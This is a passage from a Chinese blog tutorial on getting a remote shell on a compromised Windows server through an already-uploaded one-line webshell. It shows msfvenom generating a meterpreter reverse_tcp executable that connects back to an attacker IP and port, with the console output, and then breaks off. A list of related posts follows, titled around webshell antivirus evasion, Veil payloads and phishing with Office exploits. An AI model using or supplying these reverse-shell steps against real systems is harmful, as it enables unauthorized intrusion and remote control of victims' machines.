APT级全面免杀拿Shell
现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。
一、windows一句话木马反弹shell思路
前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。
启动kali中的msf
┌──(root@SC)-[~]
└─# msfconsole
生成exe类型反弹型木马,LHOST=kali 的 ip。
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
APT级全面免杀拿Shell相关推荐
- 浅谈PHP木马免杀之如何过狗过宝塔过阿里云D盾
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面 ...
- 从后渗透分析应急响应的那些事儿(二)免杀初识篇
从后渗透分析应急响应的那些事儿(二)免杀初识篇 文章首发于freebuf Tidesec专栏 https://www.freebuf.com/column/204005.html,转载到个人博客记录, ...
- 实测FourEye免杀 vs 实战化白帽子如何学习
文章来源|MS08067 内网安全知识星球 本文作者:Ryze(Ms08067内网安全小组成员) 内网纵横四海 认准Ms08067 本文目的只为了解免杀技术和配合攻击技术达到一定攻击效果,文中所涉及 ...
- 在linux下做源码免杀,Cobaltstrike免杀从源码级到落地思维转变
文章来源: https://www.freebuf.com/articles/web/258988.html 前言 距离上一篇文章<那些FastJson漏洞不为人知的事情(开发角度)>已经 ...
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
- shell 免杀aspx_对于asp免杀webshell的一些总结
0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...
- shell 免杀aspx_记一次aspx网站渗透
通过前期信息搜集获取到目标站的80xx端口 发现一处源码泄露 查看配置文件 登录manage.aspx 上传shell 发现安装了TeamViewer 看下进程如果运行tv的话,可直接读取其远程的账号 ...
- APT之木马静态免杀
前言 这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于自己 ...
- 【红队APT】钓鱼篇Office-CVE漏洞RLO隐藏压缩包释放免杀打包捆绑
文章目录 文件后缀-钓鱼伪装-RLO 压缩文件-自解压-释放执行 Office套件-CVE漏洞-MSF&CS Microsoft MSDT CVE-2022-30190 代码执行 Micros ...
最新文章
- Failure [INSTALL_FAILED_ALREADY_EXISTS
- 95. Unique Binary Search Trees II 不同的二叉搜索树 II
- 在Metro App中显示Toast notification
- 基本类型数组转包装类型数组工具类
- filter IE滤镜(Internet Explorer)CSS
- 微信小程序之下拉刷新,上拉更多列表实现
- csharp与java的区别_C#与JAVA之比较(1)
- python爬虫小项目价格_爬虫项目怎么收费?
- 高速PCB设计的一些注意事项
- Openg~lopengl中文手册4.5
- 一个完全免费的在线文字云网站
- 播放量破4亿。《梦华录》创2022年国产剧豆瓣最高开分,它凭何爆火?
- 计网实验-1_Cisco Package Trace:Basic switch setup
- 在子域下安装Exchange服务器并批量生成用户为每一位用户建立邮箱
- 波兰式与逆波兰式的转换和表达式求值
- onvif/rtsp转gb28181协议,无缝对接国标平台
- JVM成神之路-JVM引用模型
- stagefright框架(四)-Video Buffer傳輸流程 .
- Google Play集成介绍
- 苹果id密码忘了怎么办?轻松重置,赶紧收藏!